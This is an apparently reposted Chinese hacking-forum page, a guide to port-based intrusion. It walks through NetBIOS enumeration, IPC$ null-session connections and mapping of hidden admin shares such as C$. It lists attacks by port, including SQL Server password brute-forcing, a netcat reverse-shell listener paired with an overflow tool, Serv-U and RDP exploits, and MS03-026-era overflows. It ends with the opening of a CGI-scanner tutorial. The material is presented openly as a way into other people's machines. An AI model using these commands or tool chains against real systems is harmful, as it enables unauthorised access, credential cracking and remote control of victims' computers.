您的位置:首页 > 理论基础

计算机端口入侵大全

2009-03-22 16:57 218 查看
139端口入侵之菜鸟版

如果用扫描程序报告一个主机开着139端口,下面我们自然可以通过NetBios端口来获取信息,当然要花费一些时间。NetBios一般被看做是开销很大的大容量协议,速度往往很慢。我们首先要用到的是nbtstat命令,用来查询涉及到NetBios信息的网络机器。要注意的参数也只有两个,无用的俺们不说。[cmd>nbtstat -A IP-address]这个命令的作用是列出为其IP地址提供的远程计算机名字表(也就是收集对方的就算机名和工作组)。[cmd>nbtstat -R]意思是消除和重新加载远程高速缓存器名字表。

我们已经通过第一个命令获得对方的主机名及工作组,那么我们就可以用来修改lmhosts.sam文件。有很多人都不知道lmhosts文件的用途,其实它用于把NetBios名字映射到IP地址。如果打开lmhosts文件,就可以看到这个文件的说明和使用方法,我们把得到的计算机名、工作组、IP地址按照以下方法写入lmhosts文件,[eg:102.54.94.97 rhino #PRE #DOM:networking]#PRE标签表示应该把表目预加到netbios高速缓存器中。#DOM标签表示域活动。这时,网络入侵者就会发出一个[cmd>nbtstat -R]命令,把表目预加载到他的高速缓存器中。从技术角度来看,这个预加载会使表目看起来好像已经由一些网络功能解析过,并使名字解析起来更快捷。

下一步,我们就要视操作系统而定了,如果是WIN9X,就发出[cmd>net view /IP-address]命令列出远程共享列表。如果是NT以上的操作系统,那么我们就还必须插入一步,很多初学者都听说了IPC$(进程间通信),可就是不明白是什么意思,我就简单说明一下:IPC$共享是NT主机上一个标准的隐藏共享,主要用于服务器与服务器之间的通信。NT主机用来互相连接并通过这个共享获得各种必要信息。通过这个共享,网络入侵者从技术上就能够实现与你的服务器的有效连接。如果是有空连接的漏洞,那么我们就可以在不需要提供任何身份证明的情况下建立这一连接。我们可以打入[cmd>net use /IP-addressipc$ “” /user:“”]尝试空连接,一旦连接成功,我们就可以用[net view]命令列出已知共享。附带一句:如果是WIN9X要对NT进行IPC$空连接,就必须使用一下格式[cmd>net use /IP-addressipc$ user:]。

我们已经获得对方的共享列表,那么就可以用[cmd>net use X: /IP-addresssharename]将对方共享夹映射成自己的网络硬盘。我们知道NT都有自己的隐藏共享,如:C$、D$、ADMIN$等,空连接成功后,我们就尝试将这些隐藏映射,当然是只有当共享不设密码或分配给everyone群组时这一攻击才有效。

现在我们已经进入对方的机器,能够做什么我也不再述下去了。也许你对上面的一些IPC$连接、共享文件设置有密码还耿耿于怀,那么我就推荐几个软件,如:网络刺客、SID工具、NAT等。

139端口,IPC漏洞的入侵
139端口的入侵1,2请看http://www.26630.com/dispbbs.asp?boardid=161&id=926&star=1#1764
首先当然是扫一下网上开了139端口的机子了
其实139端口也就是NetBIOS session端口 进行文件和打印共享的端口,你要先用NBTSTAT看一下NETBIOS的信息
命令方式nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]开关: -a 列出给定主机名的远程计算机的名字表(name table)
-A 列出给定IP地址的远程计算机的名字表 -c 列出远程名字缓冲区(name cache),包括IP地址
-n 列出本地NetBIOS 名字
-r 列出通过广播(broadcast)和WINS解析的名字
-R 清除和重新装入远程的缓冲的名字表
-S 列出和目标IP地址会话的表
-s 列出会话表转换
OK,我们在来看看共享
C:/>net view //[目标计算机的IP地址]
不过有可能会被拒绝
在试试C:/>net use //IP/ipc$ "" /user:""
The command completed successfully.
C:/>net view //IP Shared resources at //IP
Share name Type Used as Comment
IPC成功建立后,服务器的共享资源列表才能访问到
我们在看一下有没有可以用net命令进行连接的。
c:/>net use x: //[ipaddr]/[share]
万一不行的话我们就用上面的方法IPC$
139端口的入侵1,2请看http://www.26630.com/dispbbs.asp?boardid=161&id=926&star=1#1764
一旦IPC$共享顺利完成,我们就可以映射了,(晕,不知什么是映射,下次在说吧):
c:/>net use g: //IP/c$
得到了C$共享,并将该目录映射到g:,键入:
c:/>dir g: /p
就能显示这个目录的所有内容。
成功地进行了IPC$连接后,点击Start -> Run,键入regedit。选择Registry -> Connect Network Registry,再键入那台机器的IP地址。不一会,就能看目标计算机的的Registry了。

呵呵,搞定了
这个命令很有用呀
C:/>net use //0.0.0.0/ipc$ 密码/user:用户名
这个也可以
c:/>net use g: //IP/c$
139端口的入侵1,2请看http://www.26630.com/dispbbs.asp?boardid=161&id=926&star=1#1764

各种端口入侵

1.1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

有很多网站为了安全起见,在WEB Server前面架了防火墙,或者做了TCP/IP过滤,对外只开放TCP 80端口。从入侵者角度来看,要入侵那么从80上跑的CGI入手是比较可行的,当然也可以用别的办法,例如旁敲侧击,呵呵。从网管角度来看,一是要保证CGI的安全性,另外网络的整体安全性也是很重要的。针对基于80端口入侵、防范而出的CGI扫描器数不胜数,但基本上原理都一样。
  CGI扫描器原理说起来其实非常简单,可以用四句话来概括:<1>连接目标WEB SERVER;<2>发送一个特殊的请求;<3>接收目标服务器返回数据;<4>根据返回数据判断目标服务器是否有此CGI漏洞。
  当管理的服务器达到一定数量的时候,手工检测自己的服务器是否存在各种各样的CGI漏洞,那就太消耗时间和精力了,所以一个网管手上有个比较好用的CGI漏洞扫描器还是必要的。OK!今天我们就自己来动手用C写一个简单的CGI扫描器,帮助自己在日常工作中检测服务器:))
  源代码如下,很多地方我都加了注释,别嫌我烦哦:))编译好的程序可以从http://eyas.3322.net/program/cgicheck.exe下载。
  /************************************************************************* Module:CGICheck.cpp Author:ey4s Date:2001/5/16说明:这是一个Console下多线程,带有进度显示的CGI扫描器的模板,更改一下szSign和SendBuff就可以扫描其他CGI漏洞,设置了连接、发送、接收超时,速度还可以哦。希望可以帮助到admins检测自己的服务器:))
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: